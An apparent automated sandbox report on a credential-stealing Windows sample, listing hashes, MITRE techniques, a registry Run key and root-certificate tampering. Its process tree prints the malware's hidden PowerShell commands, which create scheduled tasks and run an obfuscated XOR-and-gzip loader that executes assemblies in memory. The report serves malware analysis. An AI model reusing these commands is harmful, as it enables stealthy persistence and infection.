1c1ef5f2c13da4e6399a1d1b4600dfc474c3a74447fdff219f0df449e4da908c

General

Target

data1.exe
Size

26KB
MD5

c7efa0a867ddb94500488ce06340a698
SHA1

de915803ab8c02e3f8bb3306ca3c1a17cecb1fb1
SHA256

1c1ef5f2c13da4e6399a1d1b4600dfc474c3a74447fdff219f0df449e4da908c
SHA512

9ca3c189a6c86c65a3bf58faaa3d881338a3a57c5c1ebe2b3b5956bf463f9aaf61505145802e9bc6a2c03962e92780eabd7a7f8de62cf427317c4212f6a851c7
SSDEEP

384:0UjR1b5SoBLh9ir0R5FYec717ubmjkC38ZlW/souo/SuUGD:H1oePZYp76W0ouYSuUG

Score

7^/10

persistence spyware stealer

Malware Config

Signatures

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-86725733-3001458681-3405935542-1000\Software\Microsoft\Windows\CurrentVersion\Run\BlueStacks_bgp642023 = "\"C:\\Users\\Admin\\AppData\\Roaming\\FirefoxUpdate.exe\" \"C:\\Users\\Admin\\AppData\\Roaming\\Firefox.bat\""	data1.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	data1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	data1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	data1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	data1.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	data1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	data1.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2644	powershell.exe
2744	powershell.exe
2776	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1764	data1.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2744	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 1764 wrote to memory of 2776	1764	data1.exe	29
PID 1764 wrote to memory of 2776	1764	data1.exe	29
PID 1764 wrote to memory of 2776	1764	data1.exe	29
PID 1764 wrote to memory of 2776	1764	data1.exe	29
PID 1764 wrote to memory of 2744	1764	data1.exe	31
PID 1764 wrote to memory of 2744	1764	data1.exe	31
PID 1764 wrote to memory of 2744	1764	data1.exe	31
PID 1764 wrote to memory of 2744	1764	data1.exe	31
PID 1764 wrote to memory of 2644	1764	data1.exe	32
PID 1764 wrote to memory of 2644	1764	data1.exe	32
PID 1764 wrote to memory of 2644	1764	data1.exe	32
PID 1764 wrote to memory of 2644	1764	data1.exe	32

C:\Users\Admin\AppData\Local\Temp\data1.exe
"C:\Users\Admin\AppData\Local\Temp\data1.exe"
1⤵
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1764
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c $taskName = 'ChromeMaint';$taskExe = 'C:\Users\Admin\AppData\Local\taskum.exe';$taskarg = 'C:\Users\Admin\AppData\Local\Chrome.bat';$taskWD = 'C:\Users\Admin\AppData\Local\Pac';$taskExists = Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName };$A = New-ScheduledTaskAction -Execute $taskExe -WorkingDirectory $taskWD -Argument $taskarg;if($taskExists) {Set-ScheduledTask -TaskName $taskName -Action $A;} else {$T = New-ScheduledTaskTrigger -AtLogOn -User ($env:USERNAME);$S = New-ScheduledTaskSettingsSet -StartWhenAvailable -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0;$D = New-ScheduledTask -Action $A -Trigger $T -Settings $S;Register-ScheduledTask -TaskName $taskName -InputObject $D;}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c $taskName = 'FireFoxMaint';$taskExe = 'C:\Users\Admin\AppData\Local\taskUnity\task.exe';$taskarg = '\"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe\" \"-w\" \"hidden\" \"-c\" \"$Cxkl=''FlCxklXuCxklXsCxklXh''.Replace(''CxklX'', '''');$XWpH=''WCxklXriCxklXtCxklXe''.Replace(''CxklX'', '''');$Ebst=''RCxklXeCxklXaCxklXd''.Replace(''CxklX'', '''');$AjKr=''LCxklXoCxklXaCxklXd''.Replace(''CxklX'', '''');$nAlz=''RCxklXeaCxklXdCxklXACxklXllCxklXTCxklXexCxklXt''.Replace(''CxklX'', '''');$rkwq=''EnCxklXtCxklXryCxklXPoCxklXinCxklXt''.Replace(''CxklX'', '''');$ywGh=''InCxklXvCxklXokCxklXe''.Replace(''CxklX'', '''');$rrKG=''FrCxklXomCxklXBaCxklXseCxklX64CxklXSCxklXtrCxklXing''.Replace(''CxklX'', '''');function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.$Ebst($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.$XWpH($bRTaW,0,$FgteA);$hRgEv.$Cxkl();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();}function JeGso($kGFsz){$PzChi=[System.Convert]::$rrKG(''hkguTzSCb75g7sJ9ChMcmAOPpeBL9ZJy/tejnoCjT+E='');For ($i=0; $i -lt $kGFsz.Length; $i++){$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;}$YjPOO = cSUex(JeGso([Convert]::$rrKG([System.IO.File]::$nAlz(''C:\Users\Admin\AppData\Local\Pac\data1.txt''))));[System.Reflection.Assembly]::$AjKr([byte[]]$YjPOO).$rkwq.$ywGh($null,$null);\"';$taskWD = 'C:\Users\Admin\AppData\Local\Pac';$taskExists = Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName };$A = New-ScheduledTaskAction -Execute $taskExe -WorkingDirectory $taskWD -Argument $taskarg;if($taskExists) {Set-ScheduledTask -TaskName $taskName -Action $A;} else {$T = New-ScheduledTaskTrigger -AtLogOn -User ($env:USERNAME);$S = New-ScheduledTaskSettingsSet -StartWhenAvailable -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0;$D = New-ScheduledTask -Action $A -Trigger $T -Settings $S;Register-ScheduledTask -TaskName $taskName -InputObject $D;}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2744
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -c $taskName = 'CFoxMaint';$taskExe = 'C:\Users\Admin\AppData\Local\taskUnity\task.exe';$taskarg = '\"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe\" \"-w\" \"hidden\" \"-c\" \"$uSJv=''FluSJvLuuSJvLsuSJvLh''.Replace(''uSJvL'', '''');$Lbbi=''WuSJvLriuSJvLtuSJvLe''.Replace(''uSJvL'', '''');$wDvd=''RuSJvLeuSJvLauSJvLd''.Replace(''uSJvL'', '''');$QYkK=''LuSJvLouSJvLauSJvLd''.Replace(''uSJvL'', '''');$DQGp=''RuSJvLeauSJvLduSJvLAuSJvLlluSJvLTuSJvLexuSJvLt''.Replace(''uSJvL'', '''');$rUYC=''EnuSJvLtuSJvLryuSJvLPouSJvLinuSJvLt''.Replace(''uSJvL'', '''');$WdAx=''InuSJvLvuSJvLokuSJvLe''.Replace(''uSJvL'', '''');$yvmD=''FruSJvLomuSJvLBauSJvLseuSJvL64uSJvLSuSJvLtruSJvLing''.Replace(''uSJvL'', '''');function cSUex($kGFsz){$SjAZa=New-Object System.IO.MemoryStream(,$kGFsz);$zIanR=New-Object System.IO.MemoryStream;$vRvnd=New-Object System.IO.Compression.GZipStream($SjAZa,[IO.Compression.CompressionMode]::Decompress);$hRgEv = New-Object System.IO.BinaryWriter($zIanR);$bRTaW = New-Object byte[](1024);while($true){$FgteA = $vRvnd.$wDvd($bRTaW,0,1024);if($FgteA -le 0){break;}$hRgEv.$Lbbi($bRTaW,0,$FgteA);$hRgEv.$uSJv();}$vRvnd.Dispose();$SjAZa.Dispose();$hRgEv.Close();$zIanR.Dispose();$zIanR.ToArray();}function JeGso($kGFsz){$PzChi=[System.Convert]::$yvmD(''hkguTzSCb75g7sJ9ChMcmAOPpeBL9ZJy/tejnoCjT+E='');For ($i=0; $i -lt $kGFsz.Length; $i++){$ix = $i % $PzChi.Length;$kGFsz[$i] = $kGFsz[$i] -bxor $PzChi[$ix];}$kGFsz;}$YjPOO = cSUex(JeGso([Convert]::$yvmD([System.IO.File]::$DQGp(''C:\Users\Admin\AppData\Local\Pac\data2.txt''))));[System.Reflection.Assembly]::$QYkK([byte[]]$YjPOO).$rUYC.$WdAx($null,$null);\"';$taskWD = 'C:\Users\Admin\AppData\Local\Pac';$taskExists = Get-ScheduledTask | Where-Object {$_.TaskName -like $taskName };$A = New-ScheduledTaskAction -Execute $taskExe -WorkingDirectory $taskWD -Argument $taskarg;if($taskExists) {Set-ScheduledTask -TaskName $taskName -Action $A;} else {$T = New-ScheduledTaskTrigger -AtLogOn -User ($env:USERNAME);$S = New-ScheduledTaskSettingsSet -StartWhenAvailable -Hidden -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0;$D = New-ScheduledTask -Action $A -Trigger $T -Settings $S;Register-ScheduledTask -TaskName $taskName -InputObject $D;}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2644

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

2

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
6be68fdc644afe0ec09cc5870e768550

SHA1
995b8d545c882dde9ea0a90225d9d844dbe89aa5

SHA256
f84460e1a4d9daa961859d8d59af6ff66cf4c2f67e2c2aa63b44aa099692a4f6

SHA512
061cda51b1f9447e2e8234c395a22c81d2ad06ff1fe0c33b5f36deb1fce0b8e812680cd2f4e37d151923d60753c82c8f11b10a14a84d6ec2bc195a2358ca7772

Download Submit
C:\Users\Admin\AppData\Local\Temp\BlueFiles\Old\info.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab983C.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar985E.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\E4A9O39NPVSDXQTKNEFP.temp

Filesize
7KB

MD5
65bf0e144f12f05a9d5417757d5a71fe

SHA1
48d5695f7aeb313a08092f09145612fc6a21c4d3

SHA256
bf86e12c86345e5e701b51b4ce7a99ea3b944bc089a1def2d529f679c7ba8049

SHA512
9ca7f6bdb498029199733a1696c4b93f9961d8e44343437eef29aeceddf71073adba3b83ef2a0a8e9d859b50be5750680e865962d6cd7186c1f88bd9b11c788d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
65bf0e144f12f05a9d5417757d5a71fe

SHA1
48d5695f7aeb313a08092f09145612fc6a21c4d3

SHA256
bf86e12c86345e5e701b51b4ce7a99ea3b944bc089a1def2d529f679c7ba8049

SHA512
9ca7f6bdb498029199733a1696c4b93f9961d8e44343437eef29aeceddf71073adba3b83ef2a0a8e9d859b50be5750680e865962d6cd7186c1f88bd9b11c788d

Download Submit
memory/1764-38-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

Filesize
9.9MB

Download
memory/1764-1-0x000007FEF5800000-0x000007FEF61EC000-memory.dmp

Filesize
9.9MB

Download
memory/1764-2-0x000000001AB20000-0x000000001ABA0000-memory.dmp

Filesize
512KB

Download
memory/1764-9-0x000000001B150000-0x000000001B1F6000-memory.dmp

Filesize
664KB

Download
memory/1764-12-0x00000000003C0000-0x00000000003CC000-memory.dmp

Filesize
48KB

Download
memory/1764-0-0x00000000009B0000-0x00000000009BC000-memory.dmp

Filesize
48KB

Download
memory/2644-24-0x0000000073E50000-0x00000000743FB000-memory.dmp

Filesize
5.7MB

Download
memory/2644-27-0x00000000025B0000-0x00000000025F0000-memory.dmp

Filesize
256KB

Download
memory/2644-150-0x00000000025B0000-0x00000000025F0000-memory.dmp

Filesize
256KB

Download
memory/2644-148-0x00000000025B0000-0x00000000025F0000-memory.dmp

Filesize
256KB

Download
memory/2644-34-0x00000000025B0000-0x00000000025F0000-memory.dmp

Filesize
256KB

Download
memory/2644-146-0x0000000073E50000-0x00000000743FB000-memory.dmp

Filesize
5.7MB

Download
memory/2644-32-0x00000000025B0000-0x00000000025F0000-memory.dmp

Filesize
256KB

Download
memory/2644-29-0x0000000073E50000-0x00000000743FB000-memory.dmp

Filesize
5.7MB

Download
memory/2744-33-0x0000000002730000-0x0000000002770000-memory.dmp

Filesize
256KB

Download
memory/2744-37-0x0000000002730000-0x0000000002770000-memory.dmp

Filesize
256KB

Download
memory/2744-28-0x0000000073E50000-0x00000000743FB000-memory.dmp

Filesize
5.7MB

Download
memory/2744-36-0x0000000002730000-0x0000000002770000-memory.dmp

Filesize
256KB

Download
memory/2744-152-0x0000000002730000-0x0000000002770000-memory.dmp

Filesize
256KB

Download
memory/2744-151-0x0000000002730000-0x0000000002770000-memory.dmp

Filesize
256KB

Download
memory/2744-23-0x0000000073E50000-0x00000000743FB000-memory.dmp

Filesize
5.7MB

Download
memory/2744-145-0x0000000073E50000-0x00000000743FB000-memory.dmp

Filesize
5.7MB

Download
memory/2776-31-0x00000000027A0000-0x00000000027E0000-memory.dmp

Filesize
256KB

Download
memory/2776-147-0x0000000073E50000-0x00000000743FB000-memory.dmp

Filesize
5.7MB

Download
memory/2776-35-0x00000000027A0000-0x00000000027E0000-memory.dmp

Filesize
256KB

Download
memory/2776-149-0x00000000027A0000-0x00000000027E0000-memory.dmp

Filesize
256KB

Download
memory/2776-30-0x0000000073E50000-0x00000000743FB000-memory.dmp

Filesize
5.7MB

Download
memory/2776-25-0x0000000073E50000-0x00000000743FB000-memory.dmp

Filesize
5.7MB

Download
memory/2776-26-0x00000000027A0000-0x00000000027E0000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads